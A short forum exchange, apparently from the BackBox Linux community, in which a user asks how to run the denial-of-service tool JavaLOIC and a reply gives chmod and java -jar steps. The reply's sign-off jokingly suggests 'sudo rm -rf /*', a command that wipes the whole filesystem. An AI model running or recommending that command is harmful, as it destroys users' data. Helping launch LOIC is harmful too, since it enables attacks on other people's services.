Hey guys, I'm new to the back box community and was trying to run a .jar, but every time I try to run it I get the "executable bit error" and i have looked into the permissions menu and have not found anything that says "mark as executable" like my Ubuntu boot does.I am running this on backbox rather than ubuntu because i'm trying to run JavaLOIC.. ( I dual boot the two. Don't judge me) If anybody knows of a way to execute it, please give me some instructions or point me in the direction of a thread explaining the process. Thanks in advance if anybody replies.  :)

Hi,

Just tested and working without issues.

1. Install Java
2. Set permission "chmod +x JavaLOIC.jar"
3. Then just run "java -jar JavaLOIC.jar"

And have fun.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
